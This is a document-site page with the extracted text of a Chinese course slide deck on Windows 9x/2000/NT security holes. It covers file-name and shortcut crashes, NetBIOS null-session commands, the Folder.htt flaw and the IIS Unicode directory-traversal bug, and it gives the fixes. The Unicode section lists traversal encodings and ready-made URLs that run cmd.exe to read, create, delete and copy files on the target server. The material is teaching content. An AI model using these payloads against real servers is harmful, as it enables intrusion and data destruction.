网络安全技术-电子教案-吴锐 WINDOWS9x2000NT系统安全

上传人:E**** 文档编号:89427048 上传时间:2019-05-25 格式:PPT 页数:137 大小:362KB
返回 下载 相关 举报
网络安全技术-电子教案-吴锐 WINDOWS9x2000NT系统安全_第1页
第1页 / 共137页
网络安全技术-电子教案-吴锐 WINDOWS9x2000NT系统安全_第2页
第2页 / 共137页
网络安全技术-电子教案-吴锐 WINDOWS9x2000NT系统安全_第3页
第3页 / 共137页
网络安全技术-电子教案-吴锐 WINDOWS9x2000NT系统安全_第4页
第4页 / 共137页
网络安全技术-电子教案-吴锐 WINDOWS9x2000NT系统安全_第5页
第5页 / 共137页
点击查看更多>>
资源描述

《网络安全技术-电子教案-吴锐 WINDOWS9x2000NT系统安全》由会员分享,可在线阅读,更多相关《网络安全技术-电子教案-吴锐 WINDOWS9x2000NT系统安全(137页珍藏版)》请在金锄头文库上搜索。

1、WINDOWS9x/2000/NT系统安全,M,Windows9x漏洞,DOS设备名 当用户在Win 95/98上接收了一个命令,只要文件或文件夹名称中包含一台DOS设备名时,就会发生系统崩溃;如果在浏览网页时,用户按下了一个包含非法路径(例如包含DOS设备名)的链接,也会发生系统崩溃;如果用户在E-mail软件中打开了预览模式,当他收到E-mail,其中夹带一个包含非法路径的HTML链接时,他的Windows系统也会崩溃。 解决办法:到 http:/ 下载安装对应的补丁。,M,Windows文件扩展名欺骗漏洞,漏洞描述: 如果命名一个文件名字:“file.html .exe“ 其中用ASCI

2、I的255来代替其中的空格,那么,在WINDOWS里面将只能看见文件名是:file.html。 并且这个文件名欺骗对IE的下载对话框同样存在,恶意者可能连接一个可执行文件,但是让人看起来象一个HTML网页,M,Windows快捷方式漏洞,Windows快捷方式包括扩展名为lnk、pif、url的文件。其中url文件为纯文本格式lnk 和pif文件为二进制文件。这三种快捷方式都可以自定义图标文件,当把图标文件名设定为 Windows的默认设备名时,由于设备名称解析漏洞,可导致Windows 95/98系统崩溃。由于 对图标的搜索是由Explorer自动完成的,所以只要快捷方式在资源浏览器中出现,

3、就会导 致系统崩溃。如果快捷方式在桌面上,那么系统一启动就会崩溃。只有以DOS启动系统,在 命令行下删除。由于无法直接设置图标文件名为设备名,只有通过直接编辑的方式来创建。,M,Windows快捷方式漏洞,对于Windows NT/2000系统不会由于设备名称解析而崩溃。但当我们创建一个完全由 ASCII字符填充组成的pif文件时会出现以下情况: 1)一个非法的pif文件(用ascii字符x填充)至少要369字节,系统才认为是一个 合法的pif文件,才会以pif的图标pifmgr.dll,0显示,在属性里有程序、 字体、内存、屏幕”等内容。而且仅仅当一个非pif文件的大小是369字节时察看 属

4、性的“程序”页时,不会发生程序错误,哪怕是370字节也不行。当对一个大于 369字节的非法pif文件察看属性的“程序”页时,Explorer会出错,提示:,M,Windows快捷方式漏洞,“0x77650b82“指令引用的“0x000000000“内存。该内存不能为“read“ 但这种错误并不会引起缓冲溢出的安全问题。初步分析了一下,问题出在pif文件 的16进制地址: 0x000001810x870x000001820x01和 0x000002310xC30x000002320x02 即使是一个合法pif文件,只要改动这四处的任意一处,也会引起程序错误。而只 要把0x00000181和0x0

5、0000182的值改为0xFF0xFF,那么其它地址任意更改 都不会引起错误。,M,Windows快捷方式漏洞,2)当一个大于30857的非法pif文件(用ascii字符x填充)出现在资源管理器中时, 会使系统的CPU资源占用达100%,根本不能察看其属性页。也无法在资源管理器中 对其进行任何操作,甚至不能在命令提示符中删除。试图删除时会提示会提示: “进程无法访问文件,因为另一个程序正在使用此文件。” 但只要把0x00000181和0x00000182中任意一处改为0xFF这种情况就不会发生。 这是由于资源浏览器试图显示其实并不存在的图标引起的。如果快捷方式在桌面 上,那么系统一启动这种情况

6、就会出现。只有使用任务管理器中止Explorer.exe 的进程,再启动一个命令提示符,从命令行下删除。 此问题仅影响Windows NT/2000系统,不影响Windows 95/98。,M,系统安全漏洞及解决方案,NetBIOS的信息泄漏 net use serverIPC$ “ /user:“ /此命令用来建立一个空会话 net view server /此命令用来查看远程服务器的共享资源 服务器名称 注释 - pc1 pc2 命令成功完成。 net time server /此命令用来得到一个远程服务器的当前时间。,M,系统安全漏洞及解决方案,nbtstat -A server /此命

7、令用来得到远程服务器的NetBIOS用户名字表 NetBIOS Remote Machine Name Table Name Type Status - NULL UNIQUE Registered NULL UNIQUE Registered INTERNET GROUP Registered XIXI UNIQUE Registered INetServices GROUP Registered ISNULL UNIQUE Registered INTERNET GROUP Registered ADMINISTATOR UNIQUE Registered INTERNET UNIQUE

8、Registered _MSBROWSE_. GROUP Registered MAC Address = 00-54-4F-34-D8-80,M,系统安全漏洞及解决方案,修改注册表一劳永逸 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA Value Name: RestrictAnonymous Data Type: REG_DWORD Value: 1,M,Microsoft IIS 导致网络泄露,telnet target 80 Trying target. Connected to target. Escape character

9、is . HEAD /directory HTTP/1.0CRLF CRLF HTTP/1.1 401 Access Denied WWW-Authenticate: Basic realm=“ Content-Length: 644 Content-Type: text/html 测试程序: HEAD /directory HTTP/1.0CRLF CRLF,M,Microsoft Windows 98/2000 Folder.htt 漏洞(2000-8-17),windows98和2000中,一个名为Folder.htt的文件决定了文件夹以何种方式显示为web页面。这个文件包含活动的脚本解

10、释执行。如果一个用户任意打开了一个文件夹,同时以web页面形式察看该文件夹的选项为enable的话(默认选项),则Folder.htt文件中的任何代码均会以该用户的特权等级运行。通过本地文件夹和远程UNC共享都可以利用此漏洞。 问题出在ShellDefView ActiveX控件。这个控件用来确定对选中的文件执行什么操作。为了激活对选中的文件的默认操作,它使用无任何参数的InvokeVerb( )方法。文件夹中的第一个文件可以通过FileList.focus( )方法被自动选中。因此,如果创建一个文件,它默认的打开操作为“执行”,而且处于文件列表的第一个位置(默认的文件排序方式是按字母顺序,例

11、11111111.bat会因此被排在首位),则只要打开该文件所在的文件夹,就会选中并运行该文件。,M,UNICODE漏洞的原理 此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。 中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中 %c1%1c - (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = / %c0%2f - (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = NT4中/编码为%c1%9c 在英文版里:W

12、IN2000英文版%c0%af 但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测. %c1%pc %c0%9v %c0%qf %c1%8s %e0%80%af %f0%80%80%af %fc%80%80%80%80%af,系统安全漏洞及解决方案,M,系统安全漏洞及解决方案,UNICODE编码漏洞简单利用的命令 1、显示文件内容 如果想显示里面的其中一个badboy.txt文本文件,我们可以这样输入(htm,html,asp,bat等文件都是一样的)http:/x.x.x.x/scripts/%c1%1c/winnt/system32/cmd.exe?/c+type+c:b

13、adboy.txt 那么该文件的内容就可以通过IE显示出来。 2、建立文件夹的命令 http:/x.x.x.x/scripts/%c1%1c/winnt/system32/cmd.exe?/c+md+c:badboy运行后我们可以看到 返回这样的结果: CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:,M,系统安全漏洞及解决方案,3、删除空的文件夹命令 http:/x.x.x.x/sc

14、ripts/%c1%1c/winnt/system32/cmd.exe?/c+rd+c:badboy 返回信息同上 4、删除文件的命令 http:/x.x.x.x/scripts/%c1%1c/winnt/system32/cmd.exe?/c+del+c:badboy.txt 返回信息同上 5、copy文件且改名的命令 http:/x.x.x.x/scripts/%c1%1c/winnt/system32/cmd.exe?/c+copy+c:badboy.txt bad.txt 返回信息: CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 1 file(s) copied.,M,系统安全漏洞及解决方案,显示目标主机当前的环境变量 http:/127.0.0.1/scripts/%c1%1c/winnt/system32/cmd.exe?/c+set 返回的信息: CGI Error The specified CGI application

展开阅读全文
相关资源
正为您匹配相似的精品文档
相关搜索

最新文档


当前位置:首页 > 高等教育 > 大学课件

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号